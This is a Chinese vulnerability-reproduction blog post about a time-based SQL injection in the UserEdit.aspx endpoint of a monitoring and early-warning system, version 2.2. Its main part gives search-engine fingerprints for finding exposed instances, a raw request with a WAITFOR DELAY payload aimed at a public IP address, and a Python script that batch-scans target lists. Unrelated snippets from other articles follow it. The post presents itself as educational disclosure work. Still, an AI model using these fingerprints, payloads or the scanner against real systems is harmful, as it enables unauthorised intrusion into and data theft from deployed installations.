【漏洞复现】华测监测预警系统——SQL注入漏洞

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

  • 漏洞描述
  • 漏洞复现
  • 测试工具


漏洞描述

华测监测预警系统2.2版本存在sql注入,UserEdit接口SQL注入漏洞。恶意攻击者可能会向数据库发送构造的恶意SQL查询语句,以获取数据库敏感信息、修改数据或者执行其他恶意操作,还有可能直接通过sql注入获取服务器权限。

漏洞复现

1)信息收集:
fofa:icon_hash="-628229493"
Hunter:web.icon="be8e2d43a4e9bc5ce43303ce55609199"
Quake:favicon:"be8e2d43a4e9bc5ce43303ce55609199"
使用工具:Search_Viewer
文章:https://blog.csdn.net/LongL_GuYu/article/details/139818504
在这里插入图片描述
挑选目标,有缘千里来相会
在这里插入图片描述
2)构造数据包

GET /Web/SysManage/UserEdit.aspx?&ID=1%27;WAITFOR+DELAY+%270:0:3%27-- HTTP/1.1
Host: 120.211.99.228:8001

延时3秒
在这里插入图片描述
延时10秒
在这里插入图片描述
代码解释:
首先闭合原始的SQL查询,然后执行一个等待3秒的命令,最后注释掉任何可能的后续代码。

测试工具

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# 导入所需的库
import requests
import argparse
import time
from urllib3.exceptions import InsecureRequestWarning

# 定义终端输出颜色
RED = '\033[91m'
RESET = '\033[0m'

# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# 定义函数,用于检查URL是否存在特定的SQL注入漏洞
def check_vulnerability(url):
    try:
        # 构造用于检测的URL,添加了特定的SQL注入测试代码
        attack_url = url.rstrip('/') + "/Web/SysManage/UserEdit.aspx?&ID=1';WAITFOR+DELAY+'0:0:3'--"

        # 记录请求开始时间
        start_time = time.time()

        # 发送POST请求到攻击URL,不验证SSL证书,设置超时时间
        response = requests.post(attack_url, verify=False, timeout=10)

        # 计算请求完成所需的时间
        elapsed_time = time.time() - start_time

        # 如果请求时间在3到5秒之间,且状态码为200,认为存在漏洞
        if 3 < elapsed_time < 5 and response.status_code == 200:
            print(f"{RED}URL [{url}] 可能存在华测监测预警系统2.2 UserEdit.aspx SQL注入致RCE漏洞{RESET}")
        else:
            print(f"URL [{url}] 不存在漏洞")
    # 捕获请求超时异常
    except requests.exceptions.Timeout:
        print(f"URL [{url}] 请求超时,可能存在漏洞")
    # 捕获其他请求异常
    except requests.RequestException as e:
        print(f"URL [{url}] 请求失败: {e}")

# 主函数,解析命令行参数并执行检测
def main():
    # 创建参数解析器,用于解析命令行输入
    parser = argparse.ArgumentParser(description='检测目标地址是否存在华测监测预警系统2.2 UserEdit.aspx SQL注入致RCE漏洞')
    parser.add_argument('-u', '--url', help='指定目标地址')
    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')

    # 解析命令行参数
    args = parser.parse_args()

    # 如果提供了URL参数,检查该URL
    if args.url:
        if not args.url.startswith("http://") and not args.url.startswith("https://"):
            args.url = "http://" + args.url
        check_vulnerability(args.url)
    # 如果提供了文件参数,逐行检查文件中的URL
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()
            for url in urls:
                if not url.startswith("http://") and not url.startswith("https://"):
                    url = "http://" + url
                check_vulnerability(url)

# 程序入口点
if __name__ == '__main__':
    main()

运行截图:
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/742921.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

归并排序与快速排序总结-c++

一&#xff0c;归并排序 归并排序&#xff08;Merge sort&#xff09;是建立在归并操作上的一种有效的排序算法。该算法分治法&#xff08;Divide and Conquer&#xff09;的一个非常典型的应用。 作为一种典型的分而治之思想的算法应用&#xff0c;归并排序的实现由两种方法…

怎么用电脑在线制作活码?快速将活码生成的操作方法

随着现在很多内容都可以通过生成二维码的方式来展示&#xff0c;所以在很多地方都会将内容生成二维码的方式让其他人通过扫码查看内容。二维码不仅能够简化用户获取内容的流程&#xff0c;还可以降低成本&#xff0c;有效提升用户体验&#xff0c;那么不同内容的二维码如何制作…

【SQL Server数据库】数据的增删改操作

目录 一、用SQL语句完成下列功能。 1、新开设一门课程&#xff0c;名叫网络安全与防火墙&#xff0c;学时40&#xff0c;编号为“0118”&#xff0c;主要介绍网络的安全与主要的防火墙软件。 2、先建立monitor表&#xff0c;其结构与student表大致一样&#xff0e;…

c++网络通信

TCP/IP协议 OSI参考模型采用分层划分原则&#xff0c;将网络中的数据传输划分为7层&#xff0c;其中&#xff0c;物理层居于最下层&#xff0c;是最基础、核心的网络硬件层&#xff1b;应用层居于最上层&#xff0c;负责应用资源的管理。每一层使用下层的服务&#xff0c;并向…

js小题3:构造函数介绍与普通函数对比

一、构造函数介绍&#xff1a; 在JavaScript中&#xff0c;构造函数是用于创建和初始化一个由new关键字生成的对象的特殊函数。构造函数的名字通常以大写字母开头&#xff0c;但这并不是JavaScript语法的一部分&#xff0c;而是一种约定俗成的命名规范&#xff0c;有助于区分构…

海南聚广众达电子商务咨询有限公司抖音电商的领航者

在数字经济的浪潮中&#xff0c;电子商务已经成为企业发展的重要引擎。而抖音&#xff0c;这个短视频平台的崛起&#xff0c;更是为电商行业带来了全新的机遇和挑战。海南聚广众达电子商务咨询有限公司&#xff0c;作为抖音电商服务的佼佼者&#xff0c;以其专业的服务、创新的…

Go语言环境安装

Go下载地址 哪个能用用哪个。 https://go.dev/ https://golang.google.cn/&#xff08;Golang官网的官方镜像&#xff09; Windows 使用.msi安装包安装 下载msi文件 安装 双击运行go1.22.4.windows-amd64.msi Next 勾选I accept the terms in the License Agreement&…

查看es p12证书文件过期方法

查看证书过期时间: openssl pkcs12 -in elastic-certificates.p12 -nokeys -out elastic-certificates.crt (需要输入证书生成时配置密码) openssl x509 -enddate -noout -in elastic-certificates.crt

CTF实战:从入门到提升

&#x1f389;&#x1f389;欢迎来到我的CSDN主页&#xff01;&#x1f389;&#x1f389; &#x1f3c5;我是尘缘&#xff0c;一个在CSDN分享笔记的博主。&#x1f4da;&#x1f4da; &#x1f449;点击这里&#xff0c;就可以查看我的主页啦&#xff01;&#x1f447;&#x…

通付盾入选2024中国数字安全综合实力百强

近日&#xff0c;国内数字化产业第三方调研与咨询机构数世咨询正式发布《新质•中国数字安全百强报告(2024)》&#xff08;以下简称“报告”&#xff09;。通付盾凭借综合实力&#xff0c;从国内800余家经营数字安全业务的企业中脱颖而出&#xff0c;入选综合实力百强“竞争者”…

AI绘画Stable Diffusion人物背景替换实操教程,让创意无限延伸

大家好&#xff0c;我是画画的小强 Stable Diffusion以其强大的能力可以实现人物背景的更换。本文将带你深入了解如何利用Stable Diffusion中的Inpaint Anything插件快速且精准地实现人物背景的替换&#xff0c;从而让你的图片焕发新生。 前期准备 本文会使用到Inpaint Anyt…

230个大模型招投标大单,前三令人意外

大模型市场争夺白热化&#xff0c;前三的座次每个月都在变。 2024年被认为是大模型的应用落地元年&#xff0c;大模型落地的进展一直备受瞩目&#xff0c;而大模型招投标信息被认为是其中的风向标。最近&#xff0c;数智前线通过中国政府采购网、中国招投标公共服务平台、天眼…

思看科技IPO背后:募资金额下调,在创始人配偶管辖下获得补贴?

近日&#xff0c;思看科技&#xff08;杭州&#xff09;股份有限公司&#xff08;下称“思看科技”&#xff09;更新提交2023年最新财务资料&#xff0c;IPO审核进程恢复正常。据贝多财经了解&#xff0c;思看科技于2023年6月递交招股书&#xff0c;同年7月历经第一轮问询。 目…

项目maven标志消失,pom文件显示为橙色/橘色标志

背景&#xff1a; 公司开发新的项目&#xff0c;我要拉一下item服务的工程进行开发&#xff0c;等我把代码拉下来发现我idea右侧边栏的maven没了&#xff0c;pox.xml文件也变成了这种橙色/橘色的标志。 分析&#xff1a; 这个是一个不正常的maven项目pom&#xff0c;可能是由于…

Node.js实现短链接(ShortLink):shortid、epxress让URL更简单

文章目录 一、短链接介绍二、插件介绍1、epxress2、shortid 三、实现方案1、安装依赖&#xff1a;2、实现原理 四、示例代码五、测试生产短链接 一、短链接介绍 短链接是指仅包含一个网址的链接形式&#xff0c;通俗一些就是将一个很长很复杂的的网址变成一个简短易记的链接。…

【大数据技术原理与应用(概念、存储、处理、分析与应用)】第1章-大数据概述习题与知识点回顾

文章目录 单选题多选题知识点回顾几次信息化浪潮主要解决什么问题&#xff1f;信息科技为大数据时代提供哪些技术支撑&#xff1f;数据产生方式有哪些变革&#xff1f;大数据的发展历程大数据的四个特点&#xff08;4V&#xff09;大数据对思维方式的影响大数据有哪些关键技术&…

Android10 Settings系列(六)Settings中toolbar 的基本流程,和Activity如何关联,这可能是比较详细的分析

一、前言 写在前面:一个快捷栏,音量浮窗快捷进入设置界面,点击左上角返回键拉起设置首页问题引发的思考和解决方法 事情的起因是测试报了一个问题。在Android9的一个设备在点击音量键时,在弹出的弹框中,点击设置图标快速进入音量设置中,点击左上角返回按钮是,退出当前界…

GPT-5智能新纪元的曙光

在美国达特茅斯工程学院周四公布的采访中&#xff0c;OpenAI首席技术官米拉穆拉蒂被问及GPT-5是否会在明年发布&#xff0c;给出了肯定答案并表示将在一年半后发布。穆拉蒂在采访中还把GPT-4到GPT-5的飞跃描述为高中生到博士生的成长。 这一爆炸性的消息&#xff0c;震动了整体…

期货交易中的几种常见心态管理

期货交易通常涉及到风险和收益的权衡&#xff0c;因此参与者的心态可以显著影响他们的决策和最终结果。以下是一些炒期货的常见心态&#xff1a; 1. 利润最大化心态&#xff1a;持有这种心态的投资者不关心风险&#xff0c;只考虑高利润。他们可能会盲目追求高回报&#xff0…

第26课 绘制原理图——原理图布局的调整

概述 我们可以根据需要&#xff0c;对原理图上各个图元的位置进行调整&#xff0c;让整个电路图的布局更加舒服。 拖动图元 只需按住鼠标左键&#xff0c;即可拖拽图元。 旋转图元 在原理图上时选中一个图元&#xff0c;之后按一次空格键&#xff0c;即可将图元逆时针旋转90…